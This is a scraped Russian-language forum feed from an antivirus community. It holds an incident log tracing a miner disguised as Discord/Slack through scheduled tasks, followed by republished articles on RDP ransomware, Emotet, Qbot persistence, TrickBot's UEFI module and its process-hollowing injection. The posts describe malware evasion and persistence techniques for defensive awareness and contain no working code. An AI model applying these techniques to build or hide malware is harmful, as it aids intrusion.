CPU 49,85%
CPU (1 core) 797,57%
parentid = 13628
ESTABLISHED 192.168.0.98:55478 <-> 54.93.84.207:443
Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=14380
Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=9436
SHA1 1E44EE63BDB2CF3A6E48B521844204218A001344
MD5 AE3F3DC3ED900F2A582BAD86A764508C

Загруженные DLL НЕИЗВЕСТНЫЕ
BXSDK64.DLL C:\USERS\SHUM\APPDATA\LOCAL\TEMP

Загруженные DLL ИЗВЕСТНЫЕ и ПРОВЕРЕННЫЕ
ADVAPI32.DLL C:\WINDOWS\SYSTEM32
=============

[FILE ID=119088]

далее, разработчиком uVS предложена новая функция (реализована в 4.11.5 и расширена в 4.11.6), которая позволила отследить, каким образом запускается Flock.exe\Slack.exe\Discord.exe
+
спасибо, Sandor-у за оперативно добавленный диалог:
+
Vvvyg - за скрипт экспорта журналов для анализа,
+
Virus Monitoring Service Doctor Web Ltd. за поиск тела майнера в папке модулей flock

благодаря предложенной функции стало возможным отследить цепочку запуска вредоносных программ.


====quote====
EV_RenderedValue_0,00
Elvi51
ELVI51
277248
7264
C:\Windows\System32\find.exe
%%1937
16620
"C:\WINDOWS\system32\find.exe"
EV_RenderedValue_9,00
-
-
0
C:\ProgramData\Discord\Discord.exe
EV_RenderedValue_14,00

=============

К событию были добавлены следующие сведения:


====quote====
EV_RenderedValue_0,00
ELVI51$
WORKGROUP
999
16620
C:\ProgramData\Discord\Discord.exe
%%1937
1400
C:\ProgramData\Discord\Discord.exe --min
EV_RenderedValue_9,00
Elvi51
ELVI51
277248
C:\Windows\System32\svchost.exe
EV_RenderedValue_14,00
=============

по образу из uVS видим что Discord.exe запускается через задачу:


====quote====
Полное имя C:\PROGRAMDATA\DISCORD\DISCORD.EXE
Сигнатура Trojan.Win64.Miner.gen [Kaspersky] (delall) [глубина совпадения 33(58), необх. минимум 30, максимум 64] 2021-02-28

SHA1 397F3E0FD803DA50EC667C1161E57CDC242400C3
MD5 07D8343249A56EEBF2B1A8B944C217A3

Ссылки на объект
Ссылка C:\WINDOWS\TASKS\DISCORDCHECK_4.JOB
Значение "C:\ProgramData\Discord\Discord.exe" --min
=============


====quote====
4.11.5 o Добавлена поддержка отслеживания процессов.
Отслеживание процессов позволяет определять родителя любого процесса, даже если родительский процесс уже завершен, а также достоверно определять все файлы, которые запускались с момента старта системы.
=============

Полное имя C:\PROGRAMDATA\SLACK\SLACK.EXE
Тек. статус ВИРУС [Запускался неявно или вручную]

Создан 08.03.2021 в 09:52:29
Изменен 08.03.2021 в 11:17:11

Доп. информация на момент обновления списка
pid = 13816 *****\****
Процесс создан 11:17:35 [2021.03.08]
Процесс завершен 11:18:28 [2021.03.08]
parentid = 1684 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
SHA1 9C44709D620DF76174B6E268DADA1256FA3BA007
MD5 C7988D4AE969D11D9ABBAFC8CE0C5CA2

pid = 1684 NT AUTHORITY\СИСТЕМА
CmdLine C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
Процесс создан 11:16:52 [2021.03.08]

+

====quote====
4.11.6 o Добавлена поддержка отслеживания задач.
В окно информации исполняемого файла, который создавал, модифицировал или изменял задачи добавлены следующие разделы:
"Создание задачи", "Удаление задачи", "Обновление задачи" в которых указано время операции, pid процесса,
pid и имя запустившего процесс, а так же XML описание задачи при его наличии.
Твики #39/#40 теперь включают/отключают отслеживание процессов и задач.
(!) Только для Windows 10 билд 1903 и выше.
=============


14.03.2021 17:07:11, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16360/message112104/ http://forum.esetnod32.ru/messages/forum9/topic16360/message112104/ Sun, 14 Mar 2021 17:07:11 +0300 Полезная информация RDP, Ransomware - проблемы, которые никуда не денутся RDP, Ransomware - проблемы, которые никуда не денутся в форуме Полезная информация.
2020 год запомнится как один из самых сложных и трагических лет, с которыми человечество столкнулось в наше время. Глобальная пандемия изменила то, как мы живем и работаем, невероятным образом, возможно, навсегда.

Это также резко изменило ландшафт кибербезопасности. ФБР сообщило о 300-процентном росте киберпреступности в первом квартале того же года, а количество и стоимость атак с использованием программ-вымогателей выросли с беспрецедентной скоростью. Только в декабре 2020 года было зарегистрировано почти тридцать атак, включая печально известное требование на 34 миллиона долларов, которое было предъявлено электронному гиганту Foxconn.

Одна из основных причин быстрого роста числа этих атак - переход от безопасных офисных помещений к менее безопасным удаленным рабочим средам. До глобальной пандемии менее 4 процентов населения работали из дома. Однако джинн вышел из бутылки, и пути назад нет. Поэтому неудивительно, что недавний опрос Gallup показал, что 82 процента руководителей предприятий планируют более активно работать на дому (WFH) и после пандемии.

В то время как многие организации могут извлечь выгоду из более широкого выбора кандидатов на работу и снижения затрат на обслуживание и оборудование, для специалистов по безопасности среда работы на дому расширяет поверхность атаки, которую они должны защищать, и увеличивает риски фишинга, вредоносных программ и программ-вымогателей.

Целью сегодняшних организованных и изощренных киберпреступников, таких как те, что управляют Maze или Ryuk, является не отдельный компьютер, а вся сеть организации. Большинство всех атак программ-вымогателей получают доступ к сети жертвы с помощью «черного хода», который использует слабые места в программном обеспечении протокола удаленного рабочего стола (RDP) или способах его развертывания.

Об угрозе брутфорса RDP было много сообщений, и защита RDP была обязательной в течение нескольких лет, и тем не менее эти атаки продолжают приносить успех. Правда в том, что просто посоветовать людям усилить RDP недостаточно быстро. Защита от грубой силы должна быть больше, чем просто еще один пункт в постоянно растущем списке задач перегруженного работой системного администратора. Вместо этого нам нужно увидеть грубое форсирование RDP для того, что это такое, проблема обнаружения и ответа конечной точки (EDR), и обработать ее там.

Менее широко освещаются уязвимости, которые продолжают обнаруживаться в популярном программном обеспечении RDP. В 2020 году исследователи безопасности обнаружили двадцать пять уязвимостей в некоторых из самых популярных клиентов RDP, используемых предприятиями. К ним относятся:


====quote====
FreeRDP, самый популярный клиент RDP с открытым исходным кодом на Github.
Встроенный клиент RDP от Microsoft с исполняемым файлом mstsc.exe
Rdesktop, еще один клиент RDP с открытым исходным кодом и клиент RDP по умолчанию в дистрибутивах Kali Linux
=============

Многие специалисты по безопасности могут не знать об обратных уязвимостях RDP, которые могут повлиять на удаленную машину, а не на хост, к которому подключен пользователь. Кропотливая работа по инвентаризации и исправлению ошибок остается как никогда важной.

https://blog.malwarebytes.com/malwarebytes-news/2021/02/rdp-the-ransomware-problem-that-wont-go-away/
18.02.2021 08:16:45, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16329/message111913/ http://forum.esetnod32.ru/messages/forum9/topic16329/message111913/ Thu, 18 Feb 2021 08:16:45 +0300 Полезная информация невозможность установить антивирус невозможность установить антивирус При загрузки антивируса возникает ошибка MSI.1303 в форуме Полезная информация.
https://www.sendspace.com/file/6dtd2o
26.01.2021 17:44:11, Александр Дмитриев.]]> http://forum.esetnod32.ru/messages/forum9/topic16298/message111676/ http://forum.esetnod32.ru/messages/forum9/topic16298/message111676/ Tue, 26 Jan 2021 17:44:11 +0300 Полезная информация Что такое Emotet? Что такое Emotet? в форуме Полезная информация.
Банковский троян Emotet был впервые обнаружен исследователями безопасности в 2014 году. Первоначально Emotet создавался как банковское вредоносное ПО, которое пыталось проникнуть на ваш компьютер и украсть конфиденциальную и личную информацию. В более поздних версиях программного обеспечения были добавлены службы рассылки спама и вредоносных программ, в том числе других банковских троянцев. Emotet использует функции, которые помогают избежать обнаружения программного обеспечения некоторыми продуктами для защиты от вредоносных программ. Emotet использует возможности червя для распространения на другие подключенные компьютеры. Это помогает в распространении вредоносного ПО. Эта функция позволила прийти к выводу, что Emotet является одним из наиболее дорогостоящих и разрушительных вредоносных программ, поражающих государственный и частный секторы, отдельных лиц и организации, а устранение которых обходится в 1 миллион долларов за инцидент.

Что такое Emotet? Emotet - это троянец, который в основном распространяется через спам-сообщения (malspam). Заражение может происходить либо через вредоносный сценарий, файлы документов с поддержкой макросов, либо через вредоносную ссылку. Электронные письма Emotet могут содержать знакомый брендинг, который выглядит как подлинное электронное письмо. Emotet может попытаться убедить пользователей щелкнуть вредоносные файлы, используя соблазнительные выражения о «вашем счете», «платежных реквизитах» или, возможно, о предстоящей доставке от известных компаний по доставке. Emotet прошел несколько итераций. Ранние версии поступали в виде вредоносного файла JavaScript. В более поздних версиях использовались документы с поддержкой макросов для извлечения полезной нагрузки вируса с серверов управления и контроля (C&C), запускаемых злоумышленниками. Emotet использует ряд уловок, чтобы предотвратить обнаружение и анализ. Примечательно, что Emotet знает, работает ли он внутри виртуальной машины (ВМ), и будет бездействовать, если обнаружит среду песочницы, которая является инструментом, который исследователи кибербезопасности используют для наблюдения за вредоносными программами в безопасном контролируемом пространстве. Emotet также использует C&C серверы для получения обновлений. Это работает так же, как и обновления операционной системы на вашем ПК, и может происходить плавно и без каких-либо внешних признаков. Это позволяет злоумышленникам устанавливать обновленные версии программного обеспечения, устанавливать дополнительные вредоносные программы, такие как другие банковские трояны, или действовать в качестве свалки для украденной информации, такой как финансовые учетные данные, имена пользователей и пароли, а также адреса электронной почты.

Как распространяется Emotet? Основной метод распространения Emotet - вредоносный спам. Emotet просматривает ваш список контактов и отправляет его вашим друзьям, семье, коллегам и клиентам. Поскольку эти электронные письма поступают из вашей взломанной учетной записи электронной почты, электронные письма меньше похожи на спам, а получатели, чувствуя себя в безопасности, более склонны переходить по неправильным URL-адресам и загружать зараженные файлы. Если подключенная сеть присутствует, Emotet распространяется с использованием списка общих паролей, угадывая путь к другим подключенным системам в результате атаки грубой силы. Если пароль для важнейшего сервера отдела кадров - это просто «password», то, скорее всего, Emotet найдет там свой путь. Первоначально исследователи думали, что Emotet также распространяется с использованием уязвимостей EternalBlue / DoublePulsar, которые были ответственны за атаки WannaCry и NotPetya. Теперь мы знаем, что это не так. К такому выводу исследователей привел тот факт, что TrickBot, троянец, часто распространяемый Emotet, использует эксплойт EternalBlue для распространения по заданной сети. Это был TrickBot, а не Emotet, который воспользовался уязвимостями EternalBlue / DoublePulsar.

Какова история Emotet? Впервые обнаруженный в 2014 году, Emotet продолжает заражать системы и причинять вред пользователям по сей день, поэтому мы до сих пор говорим об этом, в отличие от других тенденций 2014 года . Первая версия Emotet была разработана для кражи данных банковских счетов путем перехвата интернет-трафика. Вскоре после этого была обнаружена новая версия программного обеспечения. Эта версия, получившая название Emotet version 2, поставлялась с несколькими модулями, включая систему денежных переводов, модуль против спама и банковский модуль, предназначенный для немецких и австрийских банков. К январю 2015 года на сцене появилась новая версия Emotet. Третья версия содержала скрытые модификации, предназначенные для того, чтобы вредоносная программа оставалась незамеченной, и добавляла новые цели для швейцарских банков. Перенесемся в 2018 год - новые версии троянца Emotet включают возможность установки других вредоносных программ на зараженные машины. Это вредоносное ПО может включать в себя другие трояны и программы-вымогатели. По данным Gizmodo, в июле 2019 года атака Emotet в Лейк-Сити, штат Флорида, обошлась городу в 460000 долларов в виде выплаты вымогателей. Анализ атаки показал, что Emotet служил только первоначальным вектором заражения. После заражения Emotet загрузил еще один банковский троян, известный как TrickBot и программу-вымогатель Ryuk. После относительно тихой работы на протяжении большей части 2019 года Emotet снова стал сильным. В сентябре 2019 года Malwarebytes Labs сообщила о спам-кампании, организованной ботнетами, нацеленной на жертв из Германии, Польши, Италии и Англии, с искусно сформулированными темами, такими как «Уведомление о переводе платежей» и «Просроченный счет». Открытие зараженного документа Microsoft Word запускает макрос, который, в свою очередь, загружает Emotet со взломанных сайтов WordPress.

«Текущие версии троянца Emotet включают возможность установки других вредоносных программ на зараженные машины. Это вредоносное ПО может включать в себя другие банковские трояны или службы доставки вредоносного спама »

На кого нацелен Emotet? Каждый является целью Emotet. На сегодняшний день Emotet атакует частных лиц, компании и государственные учреждения в Соединенных Штатах и Европе, похищая банковские логины, финансовые данные и даже биткойн-кошельки. Одна заслуживающая внимания атака Emotet на город Аллентаун, штат Пенсильвания, потребовала прямой помощи от группы реагирования на инциденты Microsoft для очистки и, как сообщается, стоила городу более 1 миллиона долларов для устранения. Теперь, когда Emotet используется для загрузки и доставки других банковских троянцев, список целей потенциально еще шире. Ранние версии Emotet использовались для атак на клиентов банков в Германии. Более поздние версии Emotet были нацелены на организации в Канаде, Великобритании и США.

  Как я могу защитить себя от Emotet? Вы уже делаете первый шаг к защите себя и своих пользователей от Emotet, узнав, как работает Emotet. Вот несколько шагов, которые вы можете предпринять: Держите компьютер / конечные точки в актуальном состоянии с помощью последних исправлений для Microsoft Windows. TrickBot часто поставляется в качестве полезной нагрузки Emotet, и мы знаем, что TrickBot полагается на уязвимость Windows EternalBlue для выполнения своей работы, поэтому исправляйте эту уязвимость, прежде чем киберпреступники смогут ею воспользоваться. Не загружайте подозрительные вложения и не переходите по сомнительным ссылкам. Emotet не сможет закрепиться в вашей системе или сети, если вы будете избегать этих подозрительных писем. Найдите время, чтобы обучить своих пользователей тому, как определять вредоносный спам. Обучите себя и своих пользователей созданию надежного пароля. Вы можете защитить себя и своих пользователей от Emotet с помощью надежной программы кибербезопасности, которая включает многоуровневую защиту.


https://www.malwarebytes.com/emotet/

--------------
пример работы Emotet

https://app.any.run/tasks/b8e10aa1-e3d9-4f6f-86fc-e428c9359537

Анализ Emotet:
Malware analysis: decoding Emotet, part 1

Malware analysis: decoding Emotet, part 2
06.01.2021 16:36:39, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16277/message111556/ http://forum.esetnod32.ru/messages/forum9/topic16277/message111556/ Wed, 06 Jan 2021 16:36:39 +0300 Полезная информация Когда заканчивается детектирование угрозы, начинается хантинг Когда заканчивается детектирование угрозы, начинается хантинг в форуме Полезная информация.
11:18 / 28 Декабря, 2020

Динамика развития киберпреступности сигнализирует рынку о том, что основную массу угроз компании должны уметь отражать автоматически, но этого мало.

Все сетевые атаки можно классифицировать по цели, которую преследует злоумышленник. Изначально компьютерные «нападения» совершались с целью «повандалить» - например, разрабатывались вирусы, удаляющие важную информацию. С развитием информатизации преступники стали руководствоваться другими мотивами – извлечение финансовой выгоды, реализация конкурентной борьбы, решение разведывательных задач. Все чаще стали совершаться целевые атаки, направленные на взлом определенных сетей и компьютеров. В отличие от массовых нападений («взламывается все, что можно»), злоумышленник ищет возможность проникнуть в инфраструктуру вне зависимости от степени ее защищенности. Целевая атака может быть направлена на определенную организацию, отрасль экономики, государственные структуры. Со временем такие «нападения» становятся все более изощренными. Так, например, в 2020 году японский автоконцерн Honda подвергся атаке шифровальщика Snake, в результате чего компания была вынуждена приостановить производство на ряде предприятий

Для защиты от целевых атак не существует универсального рецепта, необходима «умная» защита на всех уровнях. Group-IB недавно представила продукт Threat Hunting Framework (THF), включающий в себя несколько модулей, каждый из которых несет ряд инноваций и по своей функциональности выходит за рамки существующих продуктовых категорий, по сути, определяя принципиально новые типы инструментов защиты от кибератак. Прежде всего, в продукте интересен сам подход – впервые он устанавливает единые стандарты защиты для таких разных окружений, как ИТ-инфраструктура, рабочие места (в том числе и удаленные), а так же технологические сети (ОТ), изолированные от сети Интернет. В итоге Threat Hunting Framework – сложный комплексный продукт, предназначенный для выявления целевых атак и неизвестных типов вредоносного ПО, предоставляющий автоматизированные инструменты для блокировки обнаруженных угроз, а также для расследования инцидентов информационной безопасности и реагирования на них как внутри, так и за пределами защищенного периметра организации.

THF помогает команде ИБ связывать разрозненные события вне и внутри сети, управлять данными для хантинга и прогнозировать новые атаки


 Подробнее: https://www.securitylab.ru/analytics/515120.php
03.01.2021 14:45:35, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16272/message111533/ http://forum.esetnod32.ru/messages/forum9/topic16272/message111533/ Sun, 03 Jan 2021 14:45:35 +0300 Полезная информация Вредоносная программа Qbot перешла на новый скрытый метод автозапуска Windows Вредоносная программа Qbot перешла на новый скрытый метод автозапуска Windows в форуме Полезная информация.
Пользователь добавил изображение

Новая версия вредоносного ПО Qbot теперь активирует свой механизм сохранения непосредственно перед выключением зараженных устройств Windows и автоматически удаляет все следы при перезагрузке системы или выходе из спящего режима.

Qbot (также известный как Qakbot, Quakbot и Pinkslipbot) - это банковский троян для Windows с функциями червя, активными по крайней мере с 2009 года и используемыми для кражи банковских учетных данных, личной информации и финансовых данных.

Вредоносная программа также использовалась для регистрации нажатий клавиш пользователем, для установки бэкдоров на взломанных компьютерах и для развертывания маяков Cobalt Strike, используемых операторами программ-вымогателей для доставки полезных нагрузок программ-вымогателей ProLock и Egregor.

В недавних кампаниях жертвы Qbot были заражены с помощью фишинговых писем с вложениями документов Excel, выдаваемых за документы DocuSign.

Начиная с 24 ноября, когда исследователь угроз Binary Defense Джеймс Куинн сообщил, что была обнаружена новая версия Qbot, вредоносная программа использует более новый и скрытый механизм сохранения, который использует сообщения о завершении работы системы и возобновлении работы для переключения сохраняемости на зараженных устройствах.

«В то время как в первоначальных отчетах других исследователей говорилось, что в новой версии Qakbot был удален механизм сохранения ключа Run, он вместо этого был добавлен к более скрытому и интересному механизму сохранения, который прослушивает сообщения о завершении работы системы, а также PowerBroadcast Suspend / Resume сообщения ", - объясняет Куинн.

Троян добавит в реестр раздел Run в зараженных системах, который позволяет ему автоматически запускаться при входе в систему, и будет пытаться немедленно удалить его, как только пользователь включит питание или выйдет из спящего режима компьютер, чтобы избежать обнаружения антивирусными решениями или средствами безопасности.

Что делает эту технику незаметной, так это идеальное время, используемое разработчиками Qbot для внедрения ключа в реестр Windows.

Вредоносная программа только добавит ключ запуска перед тем, как система перейдет в спящий режим или выключится, но сделает это настолько близко к тому, что «продукты безопасности не смогут обнаружить новый ключ запуска и сообщить о нем».

Затем Qbot попытается удалить ключ сохранения несколько раз после того, как он снова запустится при пробуждении системы или входе в систему.

Хотя этот метод обеспечения устойчивости является новым для Qbot, другие вредоносные программы использовали аналогичные методы для уклонения от обнаружения в прошлом, в том числе банковские трояны Gozi и Dridex.

"Похоже, что два семейства вредоносных программ имеют схожий механизм в том смысле, что оба они прослушивают сообщения WM_QUERYENDSESSION и WM_ENDSESSION, чтобы определить, когда пользователь выходит из системы, но новая версия Qakbot идет дальше, также ища события питания, такие как WM_POWERBROADCAST и PBT_APMSUSPEND для установки своих перехватчиков, когда система также приостановлена »

Изменения в установке и конфигурации

Методика установки Qbot также была обновлена ​​в этой новой версии, поскольку она использует новую архитектуру DLL, которая объединяет загрузчик вредоносных программ и бота в одной DLL.

Ранее загрузчик избегал обнаружения автоматизированными системами «песочницы» вредоносных программ, сохраняя весь вредоносный код в отдельном компоненте DllRegisterServer и вызывая его только через regsvr32.exe или rundll32.exe при использовании определенных аргументов командной строки.

Новая версия упрощает эту технику, удаляя аргументы командной строки из процесса и переключая внедрение кода бота во вновь созданные процессы.

«Удаление переключателей командной строки и проверок анализа посредством создания нового процесса (при сохранении многих проверок антианализа и песочницы), механизм установки нового загрузчика происходит только после того, как бот был внедрен в explorer.exe»

https://www.bleepingcomputer.com/news/security/qbot-malware-switched-to-stealthy-new-windows-autostart-method/
11.12.2020 09:04:36, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16242/message111248/ http://forum.esetnod32.ru/messages/forum9/topic16242/message111248/ Fri, 11 Dec 2020 09:04:36 +0300 Полезная информация Новый модуль TrickBot предназначен для заражения вашей прошивки UEFI Новый модуль TrickBot предназначен для заражения вашей прошивки UEFI в форуме Полезная информация.
Пользователь добавил изображение

Разработчики вредоносного ПО TrickBot создали новый модуль, который исследует уязвимости UEFI, демонстрируя усилия злоумышленника на уровне, который дал бы им полный контроль над зараженными машинами.

Имея доступ к прошивке UEFI, злоумышленник установит на скомпрометированной машине контроль, который сохраняется после переустановки операционной системы или замены накопителей.

Вредоносный код, внедренный в прошивку (буткиты), невидим для решений безопасности, работающих поверх операционной системы, потому что он загружается раньше всего, на начальном этапе загрузки компьютера.

Буткиты позволяют контролировать процесс загрузки операционной системы и саботировать защиту на более высоком уровне. Поскольку код запускается на самой ранней стадии, механизм безопасной загрузки не помогает, так как он зависит от целостности прошивки.

Последствия, связанные с получением злоумышленником такого постоянного присутствия на машине, огромны, особенно в случае TrickBot, чье среднее ежедневное заражение может достигать нескольких тысяч.

Ориентация на платформы Intel

Сегодня в совместном отчете отдела кибербезопасности Advanced Intelligence (AdvIntel) и исследователей из фирмы Eclypsium, занимающейся аппаратным обеспечением и безопасностью, представлены технические подробности о новом компоненте TrickBot.

На этом этапе TrickBoot действует как средство разведки, проверяя наличие уязвимостей в прошивке UEFI зараженной машины. На данный момент проверка нацелена только на платформы Intel (Skylake, Kaby Lake, Coffee Lake, Comet Lake). Тем не менее, модуль также включает в себя код для чтения, записи и стирания прошивки, поэтому его можно использовать для значительных повреждений.

Он проверяет, активна ли защита от записи UEFI / BIOS, с помощью драйвера RwDrv.sys от RWEverything, бесплатной утилиты, которая обеспечивает доступ к аппаратным компонентам, таким как микросхема флэш-памяти SPI, на которой хранится прошивка BIOS / UEFI системы.

Данный инструмент использовался в LoJax, первом рутките UEFI, обнаруженным в дикой природе, в результате атаки российских хакеров, известных как APT28 (Fancy Bear, Sednit, Strontium, Sofacy).

   «Все запросы к прошивке UEFI, хранящейся во флэш-чипе SPI, проходят через контроллер SPI, который является частью концентратора контроллеров платформы (PCH) на платформах Intel. Этот контроллер SPI включает механизмы контроля доступа, которые можно заблокировать во время процесса загрузки, чтобы предотвратить несанкционированное изменение прошивки UEFI, хранящейся в микросхеме флэш-памяти SPI »

- совместный отчет (Eclypsium, AdvIntel)

Исследователи говорят, что защита от записи BIOS / UEFI доступна в современных системах, но эта функция часто не активна или настроена неправильно, что позволяет злоумышленникам изменить прошивку или удалить ее, чтобы заблокировать устройство.

Исследователи обнаружили модуль 19 октября и назвали его TrickBoot, за его функциональность и название вредоносного ботнета, которое его развертывает.

В образце, проанализированном Advanced Intelligence, исследователи обнаружили имя «PermaDll», связанное с файлом «user_platform_check.Dll» в новом образце TrickBot.

Изучение файла с помощью Eclypsium показало, что злоумышленник реализовал механизм, который проверял однокристальный чипсет в скомпрометированной системе.

Исследователи обнаружили, что роль модуля заключалась в выполнении запросов PCH для определения конкретной модели PCH, запущенной в системе, таким образом идентифицируя платформу. Эта информация также позволяет злоумышленнику проверить, уязвима платформа или нет.

Исследователи также обнаружили, что актер использует функции известного инструмента эксплуатации встроенного ПО и библиотеки под названием fwexpl для следующих целей:

читать данные с аппаратных портов ввода-вывода
вызвать драйвер rwdrv.sys для записи данных в аппаратные порты ввода-вывода
вызвать драйвер rwdrv.sys для чтения данных из адресов физической памяти
вызвать драйвер rwdrv.sys для записи данных по адресам физической памяти

Исследователи отмечают, что если TrickBoot работает на платформе, отсутствующей в его таблице поиска, он активирует функцию с предварительно установленным Skylake набором значений по умолчанию для операций, требующих доступа к оборудованию.

После идентификации платформы TrickBoot обращается к путям, связанным с чтением регистров для флэш-памяти (SPIBAR, PRO-PR4) и управлением BIOS (BC - содержит биты блокировки защиты от записи для доступа к BIOS на аппаратном уровне).

Интересной находкой в функции, которая пытается отключить защиту от записи BIOS, является то, что она содержит ошибку, которая считывается с неправильного смещения в регистре управления BIOS, чтобы проверить, установлен ли бит отключения защиты от записи BIOS. Это приводит к тому, что код интерпретирует, что защита от записи активна, и пытается ее отключить.

Основные последствия

TrickBot, разрабатывающий такой модуль, ясно указывает на то, что злоумышленник прилагает усилия для расширения своего контроля над скомпрометированными системами. В ботнете уже есть тысячи зараженных машин, на которых злоумышленник может выбирать наиболее ценные цели.

Телеметрия AdvIntel показывает, что ежедневное число заражений TrickBot с 3 октября по 21 ноября достигло пика в 40 000, а в среднем - от 200 до 4 000. Эти цифры консервативны, так как не учитываются зараженные компьютеры в частных сетях, которые взаимодействуют извне, используя IP-адрес шлюза.

Выбор наиболее прибыльных жертв осуществляется вручную на основе данных, полученных с помощью сценариев разведки, которые извлекают информацию из сетей, оборудования и программного обеспечения жертвы.

Операторы финансово мотивированы и используют ботнет для доставки программ-вымогателей Ryuk и Conti на дорогостоящие машины. С 2018 года они заработали не менее 150 миллионов долларов. Только у одной недавней жертвы они взяли 2200 BTC (на тот момент они оценивались в 34 миллиона долларов).

TrickBot - действительно киберпреступное предприятие, вовлеченное в несколько схем зарабатывания денег, включая банковское мошенничество и кражу финансовой / личной информации.

Защита

Джесси Майкл, из Eclypsium, пишет, что определение того, была ли взломана система на уровне прошивки UEFI, является сложной задачей.

Более тщательный метод состоит в том, чтобы прочитать содержимое микросхемы памяти SPI, когда система выключена, путем физического подключения устройства программирования флэш-памяти SPI. Однако это решение требует не только опыта, но и длительного простоя компании, поскольку в некоторых случаях микросхема припаяна к материнской плате, и это сопряжено с риском проблем с чтением.

Другой метод - использовать инструменты с открытым исходным кодом (CHIPSEC) или платформу Eclypsium, которая ищет слабые места на уровне оборудования и прошивки, а также может определить, активна ли защита от записи BIOS.

Проверка хэшей прошивки также помогает определить, не был ли изменен код. Кроме того, обновление прошивки - хороший способ убедиться, что она не подвержена известным уязвимостям.

На основе анализа образца TrickBoot модуль только идентифицирует оборудование и проверяет, доступна ли запись в область BIOS. Но это можно легко изменить, чтобы разрешить запись во флэш-память SPI и изменить прошивку системы.

https://www.bleepingcomputer.com/news/security/trickbots-new-module-aims-to-infect-your-uefi-firmware/
05.12.2020 05:53:29, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16234/message111146/ http://forum.esetnod32.ru/messages/forum9/topic16234/message111146/ Sat, 05 Dec 2020 05:53:29 +0300 Полезная информация TrickBot v 100: выпущено обновление вредоносного ПО с новыми функциями TrickBot v 100: выпущено обновление вредоносного ПО с новыми функциями в форуме Полезная информация.
Киберпреступная группа TrickBot выпустила сотую версию вредоносного ПО TrickBot с дополнительными функциями, позволяющими избежать обнаружения.

Пользователь добавил изображение


TrickBot - это вредоносное ПО, которое обычно устанавливается через вредоносные фишинговые сообщения электронной почты или другое вредоносное ПО. После установки TrickBot будет незаметно работать на компьютере жертвы, пока он загружает другие модули для выполнения различных задач.

Эти модули выполняют широкий спектр злонамеренных действий, включая кражу базы данных служб Active Directory домена, распространение в сети, блокировку экрана, кражу файлов cookie и паролей браузера, а также кражу ключей OpenSSH.

Известно, что TrickBot завершает атаку, предоставляя доступ к злоумышленникам, стоящим за вымогателями Ryuk и Conti, что еще больше усугубляет ситуацию.

В TrickBot v100 добавлены новые функции

После того, как в прошлом месяце Microsoft и их партнеры провели скоординированную атаку на инфраструктуру TrickBot, появилась надежда, что им потребуется время, чтобы восстановиться.

К сожалению, TrickBot все еще не утихает, о чем свидетельствует выпуск сотой сборки вредоносного ПО TrickBot.

Эта последняя сборка была обнаружена Виталием Кремезом из Advanced Intel, который обнаружил, что они добавили новые функции, которые затрудняют обнаружение.

В этом выпуске TrickBot теперь внедряет свою DLL в легитимный исполняемый файл Windows wermgr.exe (Windows Problem Reporting) прямо из памяти с помощью кода из проекта MemoryModule.

«MemoryModule - это библиотека, которую можно использовать для полной загрузки DLL из памяти - без предварительного сохранения на диск», - поясняет страница проекта на GitHub.

Первоначально запущенный как исполняемый файл, TrickBot внедрится в wermgr.exe, а затем завершит работу исходного исполняемого файла TrickBot.

По словам Кремеза, при внедрении DLL она будет делать это с помощью Doppel Hollowing или обработки двойного соединения, чтобы избежать обнаружения программным обеспечением безопасности.

«Этот метод использует транзакции, функцию NTFS, которая позволяет сгруппировать набор действий в файловой системе, и если какое-либо из этих действий не удается, происходит полный откат. Процесс инжектора создает новую транзакцию, внутри которой он создает новый файл, содержащий вредоносную полезную нагрузку. Затем он сопоставляет файл внутри целевого процесса и, наконец, откатывает транзакцию. Таким образом, создается впечатление, что файл никогда не существовал, даже если его содержимое все еще находится в памяти процесса, "Описание этого метода, сделанное исследователем безопасности Франческо Мурони.

Как видите, кибергруппа TrickBot не позволила нарушению своей инфраструктуры сдерживать их, и они продолжают интегрировать новые функции, чтобы предотвратить обнаружение вредоносного ПО.

К сожалению, это означает, что TrickBot останется с нами в обозримом будущем, а потребителям и предприятиям необходимо внимательно следить за тем, какие вложения электронной почты они открывают.

https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-malware-released-with-new-features/
24.11.2020 13:41:05, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16211/message111050/ http://forum.esetnod32.ru/messages/forum9/topic16211/message111050/ Tue, 24 Nov 2020 13:41:05 +0300 Полезная информация Где увидеть текущий проверяемый файл? Где увидеть текущий проверяемый файл? в форуме Полезная информация.
Раньше в Eset Nod 32 было видно, что в данный момент проверяет программа. Теперь этого нет. Где увидеть текущий проверяемый файл, те которые на "лету" при обращении к ним?
Спасибо.
05.10.2020 00:33:53, Иван Иванов.]]> http://forum.esetnod32.ru/messages/forum9/topic16048/message110412/ http://forum.esetnod32.ru/messages/forum9/topic16048/message110412/ Mon, 05 Oct 2020 00:33:53 +0300 Полезная информация Отличия сканирования с правами админа и простого Отличия сканирования с правами админа и простого в форуме Полезная информация.
Здравствуйте. Расскажите пожалуйста. Что дополнительно сканируется при выборе "сканировать, как админ"? Используется встроенный администратор (так называемый суперадмин) для этого или пользовательская учетка с админскими правами? Выполняется ли вход на админскую учетку, если ты сидишь под простым пользователем без прав админа, или просто запрашиваешь разрешение на сканирование от админа, не входя в учетку админа?  
27.07.2020 20:57:53, Подозрительный Человек.]]> http://forum.esetnod32.ru/messages/forum9/topic15963/message109421/ http://forum.esetnod32.ru/messages/forum9/topic15963/message109421/ Mon, 27 Jul 2020 20:57:53 +0300 Полезная информация Функции Eset endpoint antivirus/security 5 Функции Eset endpoint antivirus/security 5 функция антифишинга в форуме Полезная информация.
Подскажите пожалуйста есть в ESET ENDPOINT ANTIVIRUS/SECURITY ВЕРСИИ 5 функция антифишинга? Спасибо заранее!
